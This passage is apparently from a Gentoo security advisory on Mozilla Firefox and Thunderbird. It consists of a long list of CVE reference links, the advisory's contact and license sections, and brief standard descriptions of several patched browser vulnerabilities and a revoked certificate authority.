[ 238 ] CVE-2010-3170
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170
[ 239 ] CVE-2010-3171
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171
[ 240 ] CVE-2010-3173
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173
[ 241 ] CVE-2010-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174
[ 242 ] CVE-2010-3175
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175
[ 243 ] CVE-2010-3176
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176
[ 244 ] CVE-2010-3177
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177
[ 245 ] CVE-2010-3178
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178
[ 246 ] CVE-2010-3179
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179
[ 247 ] CVE-2010-3180
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180
[ 248 ] CVE-2010-3182
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182
[ 249 ] CVE-2010-3183
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183
[ 250 ] CVE-2010-3399
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399
[ 251 ] CVE-2010-3400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400
[ 252 ] CVE-2010-3765
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765
[ 253 ] CVE-2010-3766
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766
[ 254 ] CVE-2010-3767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767
[ 255 ] CVE-2010-3768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768
[ 256 ] CVE-2010-3769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769
[ 257 ] CVE-2010-3770
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770
[ 258 ] CVE-2010-3771
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771
[ 259 ] CVE-2010-3772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772
[ 260 ] CVE-2010-3773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773
[ 261 ] CVE-2010-3774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774
[ 262 ] CVE-2010-3775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775
[ 263 ] CVE-2010-3776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776
[ 264 ] CVE-2010-3777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777
[ 265 ] CVE-2010-3778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778
[ 266 ] CVE-2010-4508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508
[ 267 ] CVE-2010-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074
[ 268 ] CVE-2011-0051
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051
[ 269 ] CVE-2011-0053
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053
[ 270 ] CVE-2011-0054
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054
[ 271 ] CVE-2011-0055
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055
[ 272 ] CVE-2011-0056
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056
[ 273 ] CVE-2011-0057
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057
[ 274 ] CVE-2011-0058
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058
[ 275 ] CVE-2011-0059
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059
[ 276 ] CVE-2011-0061
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061
[ 277 ] CVE-2011-0062
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062
[ 278 ] CVE-2011-0065
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065
[ 279 ] CVE-2011-0066
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066
[ 280 ] CVE-2011-0067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067
[ 281 ] CVE-2011-0068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068
[ 282 ] CVE-2011-0069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069
[ 283 ] CVE-2011-0070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070
[ 284 ] CVE-2011-0071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071
[ 285 ] CVE-2011-0072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072
[ 286 ] CVE-2011-0073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073
[ 287 ] CVE-2011-0074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074
[ 288 ] CVE-2011-0075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075
[ 289 ] CVE-2011-0076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076
[ 290 ] CVE-2011-0077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077
[ 291 ] CVE-2011-0078
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078
[ 292 ] CVE-2011-0079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079
[ 293 ] CVE-2011-0080
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080
[ 294 ] CVE-2011-0081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081
[ 295 ] CVE-2011-0082
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082
[ 296 ] CVE-2011-0083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083
[ 297 ] CVE-2011-0084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084
[ 298 ] CVE-2011-0085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085
[ 299 ] CVE-2011-1187
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187
[ 300 ] CVE-2011-1202
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202
[ 301 ] CVE-2011-1712
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712
[ 302 ] CVE-2011-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362
[ 303 ] CVE-2011-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363
[ 304 ] CVE-2011-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364
[ 305 ] CVE-2011-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365
[ 306 ] CVE-2011-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369
[ 307 ] CVE-2011-2370
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370
[ 308 ] CVE-2011-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371
[ 309 ] CVE-2011-2372
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372
[ 310 ] CVE-2011-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373
[ 311 ] CVE-2011-2374
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374
[ 312 ] CVE-2011-2375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375
[ 313 ] CVE-2011-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376
[ 314 ] CVE-2011-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377
[ 315 ] CVE-2011-2378
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378
[ 316 ] CVE-2011-2605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605
[ 317 ] CVE-2011-2980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980
[ 318 ] CVE-2011-2981
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981
[ 319 ] CVE-2011-2982
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982
[ 320 ] CVE-2011-2983
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983
[ 321 ] CVE-2011-2984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984
[ 322 ] CVE-2011-2985
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985
[ 323 ] CVE-2011-2986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986
[ 324 ] CVE-2011-2987
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987
[ 325 ] CVE-2011-2988
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988
[ 326 ] CVE-2011-2989
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989
[ 327 ] CVE-2011-2990
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990
[ 328 ] CVE-2011-2991
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991
[ 329 ] CVE-2011-2993
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993
[ 330 ] CVE-2011-2995
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995
[ 331 ] CVE-2011-2996
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996
[ 332 ] CVE-2011-2997
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997
[ 333 ] CVE-2011-2998
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998
[ 334 ] CVE-2011-2999
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999
[ 335 ] CVE-2011-3000
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000
[ 336 ] CVE-2011-3001
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001
[ 337 ] CVE-2011-3002
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002
[ 338 ] CVE-2011-3003
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003
[ 339 ] CVE-2011-3004
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004
[ 340 ] CVE-2011-3005
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005
[ 341 ] CVE-2011-3026
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026
[ 342 ] CVE-2011-3062
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062
[ 343 ] CVE-2011-3232
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232
[ 344 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 345 ] CVE-2011-3640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640
[ 346 ] CVE-2011-3647
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647
[ 347 ] CVE-2011-3648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648
[ 348 ] CVE-2011-3649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649
[ 349 ] CVE-2011-3650
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650
[ 350 ] CVE-2011-3651
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651
[ 351 ] CVE-2011-3652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652
[ 352 ] CVE-2011-3653
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653
[ 353 ] CVE-2011-3654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654
[ 354 ] CVE-2011-3655
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655
[ 355 ] CVE-2011-3658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658
[ 356 ] CVE-2011-3659
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659
[ 357 ] CVE-2011-3660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660
[ 358 ] CVE-2011-3661
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661
[ 359 ] CVE-2011-3663
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663
[ 360 ] CVE-2011-3665
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665
[ 361 ] CVE-2011-3670
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670
[ 362 ] CVE-2011-3866
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866
[ 363 ] CVE-2011-4688
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688
[ 364 ] CVE-2012-0441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441
[ 365 ] CVE-2012-0442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442
[ 366 ] CVE-2012-0443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443
[ 367 ] CVE-2012-0444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444
[ 368 ] CVE-2012-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445
[ 369 ] CVE-2012-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446
[ 370 ] CVE-2012-0447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447
[ 371 ] CVE-2012-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449
[ 372 ] CVE-2012-0450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450
[ 373 ] CVE-2012-0451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451
[ 374 ] CVE-2012-0452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452
[ 375 ] CVE-2012-0455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455
[ 376 ] CVE-2012-0456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456
[ 377 ] CVE-2012-0457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457
[ 378 ] CVE-2012-0458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458
[ 379 ] CVE-2012-0459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459
[ 380 ] CVE-2012-0460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460
[ 381 ] CVE-2012-0461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461
[ 382 ] CVE-2012-0462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462
[ 383 ] CVE-2012-0463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463
[ 384 ] CVE-2012-0464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464
[ 385 ] CVE-2012-0467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467
[ 386 ] CVE-2012-0468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468
[ 387 ] CVE-2012-0469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469
[ 388 ] CVE-2012-0470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470
[ 389 ] CVE-2012-0471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471
[ 390 ] CVE-2012-0473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473
[ 391 ] CVE-2012-0474
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474
[ 392 ] CVE-2012-0475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475
[ 393 ] CVE-2012-0477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477
[ 394 ] CVE-2012-0478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478
[ 395 ] CVE-2012-0479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479
[ 396 ] CVE-2012-1937
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937
[ 397 ] CVE-2012-1938
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938
[ 398 ] CVE-2012-1939
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939
[ 399 ] CVE-2012-1940
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940
[ 400 ] CVE-2012-1941
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941
[ 401 ] CVE-2012-1945
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945
[ 402 ] CVE-2012-1946
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946
[ 403 ] CVE-2012-1947
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947
[ 404 ] CVE-2012-1948
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948
[ 405 ] CVE-2012-1949
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949
[ 406 ] CVE-2012-1950
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950
[ 407 ] CVE-2012-1951
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951
[ 408 ] CVE-2012-1952
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952
[ 409 ] CVE-2012-1953
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953
[ 410 ] CVE-2012-1954
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954
[ 411 ] CVE-2012-1955
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955
[ 412 ] CVE-2012-1956
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956
[ 413 ] CVE-2012-1957
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957
[ 414 ] CVE-2012-1958
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958
[ 415 ] CVE-2012-1959
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959
[ 416 ] CVE-2012-1960
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960
[ 417 ] CVE-2012-1961
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961
[ 418 ] CVE-2012-1962
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962
[ 419 ] CVE-2012-1963
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963
[ 420 ] CVE-2012-1964
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964
[ 421 ] CVE-2012-1965
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965
[ 422 ] CVE-2012-1966
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966
[ 423 ] CVE-2012-1967
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967
[ 424 ] CVE-2012-1970
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970
[ 425 ] CVE-2012-1971
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971
[ 426 ] CVE-2012-1972
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972
[ 427 ] CVE-2012-1973
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973
[ 428 ] CVE-2012-1974
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974
[ 429 ] CVE-2012-1975
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975
[ 430 ] CVE-2012-1976
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976
[ 431 ] CVE-2012-1994
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994
[ 432 ] CVE-2012-3956
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956
[ 433 ] CVE-2012-3957
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957
[ 434 ] CVE-2012-3958
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958
[ 435 ] CVE-2012-3959
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959
[ 436 ] CVE-2012-3960
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960
[ 437 ] CVE-2012-3961
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961
[ 438 ] CVE-2012-3962
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3962
[ 439 ] CVE-2012-3963
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963
[ 440 ] CVE-2012-3964
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964
[ 441 ] CVE-2012-3965
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965
[ 442 ] CVE-2012-3966
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966
[ 443 ] CVE-2012-3967
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967
[ 444 ] CVE-2012-3968
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968
[ 445 ] CVE-2012-3969
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969
[ 446 ] CVE-2012-3970
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970
[ 447 ] CVE-2012-3971
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971
[ 448 ] CVE-2012-3972
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3972
[ 449 ] CVE-2012-3973
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973
[ 450 ] CVE-2012-3975
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975
[ 451 ] CVE-2012-3976
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976
[ 452 ] CVE-2012-3977
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977
[ 453 ] CVE-2012-3978
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978
[ 454 ] CVE-2012-3980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980
[ 455 ] CVE-2012-3982
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3982
[ 456 ] CVE-2012-3984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984
[ 457 ] CVE-2012-3985
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985
[ 458 ] CVE-2012-3986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986
[ 459 ] CVE-2012-3988
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988
[ 460 ] CVE-2012-3989
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989
[ 461 ] CVE-2012-3990
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990
[ 462 ] CVE-2012-3991
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991
[ 463 ] CVE-2012-3992
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992
[ 464 ] CVE-2012-3993
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993
[ 465 ] CVE-2012-3994
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994
[ 466 ] CVE-2012-3995
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995
[ 467 ] CVE-2012-4179
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179
[ 468 ] CVE-2012-4180
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180
[ 469 ] CVE-2012-4181
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181
[ 470 ] CVE-2012-4182
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182
[ 471 ] CVE-2012-4183
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183
[ 472 ] CVE-2012-4184
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184
[ 473 ] CVE-2012-4185
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185
[ 474 ] CVE-2012-4186
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186
[ 475 ] CVE-2012-4187
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187
[ 476 ] CVE-2012-4188
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188
[ 477 ] CVE-2012-4190
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190
[ 478 ] CVE-2012-4191
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191
[ 479 ] CVE-2012-4192
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192
[ 480 ] CVE-2012-4193
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193
[ 481 ] CVE-2012-4194
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194
[ 482 ] CVE-2012-4195
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195
[ 483 ] CVE-2012-4196
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196
[ 484 ] CVE-2012-4201
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201
[ 485 ] CVE-2012-4202
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202
[ 486 ] CVE-2012-4204
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204
[ 487 ] CVE-2012-4205
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205
[ 488 ] CVE-2012-4206
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206
[ 489 ] CVE-2012-4207
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207
[ 490 ] CVE-2012-4208
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208
[ 491 ] CVE-2012-4209
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209
[ 492 ] CVE-2012-4210
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210
[ 493 ] CVE-2012-4212
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212
[ 494 ] CVE-2012-4215
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215
[ 495 ] CVE-2012-4216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216
[ 496 ] CVE-2012-5354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354
[ 497 ] CVE-2012-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829
[ 498 ] CVE-2012-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830
[ 499 ] CVE-2012-5833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833
[ 500 ] CVE-2012-5835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835
[ 501 ] CVE-2012-5836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836
[ 502 ] CVE-2012-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838
[ 503 ] CVE-2012-5839
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839
[ 504 ] CVE-2012-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840
[ 505 ] CVE-2012-5841
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841
[ 506 ] CVE-2012-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842
[ 507 ] CVE-2012-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843
[ 508 ] Firefox Blocking Fraudulent Certificates
http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-c=
ertificates/
[ 509 ] Mozilla Foundation Security Advisory 2011-11
http://www.mozilla.org/security/announce/2011/mfsa2011-11.html
[ 510 ] Mozilla Foundation Security Advisory 2011-34
http://www.mozilla.org/security/announce/2011/mfsa2011-34.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201301-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Bhd
certificate authority has been revoked from the root CA storage. This
was fixed with rootcerts-20111103.00 and nss-3.13. DigiCert
Sdn. Bhd is a Malaysian subordinate CA under Entrust and Verizon
(GTE CyberTrust). It bears no affiliation whatsoever with the
US-based corporation DigiCert, Inc., which is a member of Mozilla's
root program.
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before
3.6.24 and 4.x through 7.0 and Thunderbird before 3.1.6 and 5.0
through 7.0 allows remote attackers to inject arbitrary web script
or HTML via crafted text with Shift JIS encoding (CVE-2011-3648).
Mozilla Firefox before 3.6.24 and 4.x through 7.0 and Thunderbird
before 3.1.6 and 5.0 through 7.0 do not properly handle JavaScript
files that contain many functions, which allows user-assisted
remote attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
crafted file that is accessed by debugging APIs, as demonstrated by
Firebug (CVE-2011-3650).
The browser engine in Mozilla Firefox before 8.0 and Thunderbird before
8.0 does not properly allocate memory, which allows remote attackers
to cause a denial of service (memory corruption and application
crash) or possibly execute arbitrary code via unspecified vectors
(CVE-2011-3652).
The browser engine in Mozilla Firefox before 8.0 and Thunderbird
before 8.0 does not properly handle links from SVG mpath elements to
non-SVG elements, which allows remote attackers to cause a denial of
service (memory corruption and application crash) or possibly execute
arbitrary code via unspecified vectors (CVE-2011-3654).
Mozilla Firefox 4.x through 7.0 and Thunderbird 5.0 through 7.0 perform
access control without checking for use of the NoWaiverWrapper wrapper,
which allows remote attackers to gain privileges via a crafted web site
(CVE-2011-3655).
